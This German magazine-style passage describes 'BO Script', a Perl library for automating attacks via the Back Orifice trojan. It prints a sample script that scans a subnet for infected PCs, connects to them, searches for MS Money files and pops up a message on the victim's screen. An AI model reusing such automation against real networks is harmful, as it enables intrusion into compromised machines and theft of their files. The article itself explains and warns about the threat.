1001 Gefahr

Automatisierte Angriffe

Im Zeitalter der Skriptsprachen muß natürlich ein Tool her, mit dessen Hilfe sich Angriffe automatisieren lassen. So entstand "BO Script" als Perl-Bibliothek auf Basis eines Unix-Clients. Der Programmautor nutzte den bekannten Wrapper "Swig" (ähnlich der XS-Schnittstelle, die Perl üblicherweise nutzt), um den eigentlichen C-Code unter der Perl-Haube zu belassen. Das folgende BO-Script-Beispiel untersucht ein komplettes Subnetz nach infizierten Systemen, wählt sich in befallene PCs ein, sucht dort nach MS-Money-Dateien und gibt im Falle eines Falles eine kleine Nachricht auf den befallenen PCs aus:

unless(boscript::sweep($subnet))

{

$result = boscript::gettext();

@resultlist = split /\n/, $result;

foreach $line (@resultlist)

{

($dummy1, $host, $port, $dummy2, $serverversion, $machinename) =

split /!/, $line;

chomp $port;

print „Maschine $host auf Port $port gefunden.\n“;

boscript::set_host(„$host“);

boscript::set_port(„$port“);

boscript::raise_timeout(25);

boscript::find(„*.mny“, „c:\\“);

$result = boscript::gettext();

@resultlist2 = split /\n/, $result;

if($#resultlist2 > 2)

{

print „Money-Datei gefunden!\n“;

boscript::dialog(„Sie sollte Quicken nutzen“);

}

}

}

Ein "richtiger" Angriff dürfte kaum so glimpflich ablaufen. Gerade innerhalb eines Unternehmens kann so großer Schaden entstehen. BO Script läuft ohne große Anpassungen auf unterschiedlichen Unix-Systemen, kann jedoch leicht auf Windows portiert werden.